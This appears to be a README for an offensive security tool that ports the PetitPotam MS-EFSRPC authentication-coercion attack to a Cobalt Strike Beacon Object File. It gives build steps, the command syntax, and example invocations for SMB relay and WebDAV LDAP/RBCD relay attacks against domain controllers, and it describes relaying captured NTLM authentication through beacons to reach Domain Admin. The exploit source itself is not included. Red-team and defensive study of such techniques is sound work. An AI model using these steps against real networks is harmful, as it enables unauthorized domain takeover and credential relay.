A BOF port of the PetitPotam attack published by @topotam77
The PetitPotam attack is a way to remotely coerce a Windows host into authenticating to other systems. It abuses functionality of the MS-EFSRPC (Encrypting File System Remote) protocol, which was incompletely patched by Microsoft in the September 2021 patch round.
MS-EFSRPC allows an attacker to coerce a system into authenticating, using NTLM authentication, to a destination system chosen by the attacker. With an NTLM relaying tool such as responder.py or Impacket's ntlmrelayx.py you can relay that authentication to another system that accepts NTLM-based authentication. The impact depends on the source and destination systems, but in some cases it may provide you with near-instant Domain Admin privileges.
- Make sure that Mingw-w64 (including mingw-w64-binutils) has been installed.
- Enter the SOURCE folder within the tool folder.
- Type "make" to compile the object files.
- Use the Cobalt Strike Script Manager to import the `PetitPotam.cna` script.
Running the tool is straightforward. Once you have imported the CNA script using Cobalt Strike's Script Manager, its commands are available as Cobalt Strike commands that can be executed within a beacon. This tool supports the following command:
`PetitPotam [capture server ip or hostname] [target server ip or hostname]`
First, prepare your relaying setup (e.g. responder or ntlmrelayx). Then:
- Perform an SMB relay attack with `PetitPotam KALI DC2019` to coerce authentication from a DC to a KALI machine under our control.
- Perform a WebDAV (LDAP/RBCD relay) LPE attack with `PetitPotam KALI@80/nop localhost` to coerce authentication from our machine using WebDAV (HTTP) to a KALI machine under our control.
- Perform a WebDAV (LDAP/RBCD relay) LPE attack with `PetitPotam localhost@80/nop localhost` to coerce authentication from our machine using WebDAV (HTTP) and relay it back to our teamserver using socks/rportfwd'ing.
- To be able to coerce authentication using the WebDAV protocol, the WebDAV redirector service needs to be installed (default on client versions of Windows) and the WebClient service needs to be started. On a local Windows client the service can be started using the StartWebClient BOF which is available within this repository.
- If you need to relay back to your teamserver (running responder or ntlmrelayx) it is necessary to start two separate beacons: one beacon is configured as the socks proxy and reverse port forwarder, the other beacon is used to execute the attack. The reflective DLL version of the code does not have this shortcoming, but that version requires a Fork&Run operation.
This BOF tool has been successfully compiled on Mac OSX systems and used on Windows 8.1+ (x64) systems. Compiling the BOF code should also work on other systems (Linux, Windows) that have the Mingw-w64 compiler installed.
- This code is inspired by @topotam77's PetitPotam exploit: https://github.com/topotam/PetitPotam
- @b4rtik for help converting the RPC code to be BOF compatible.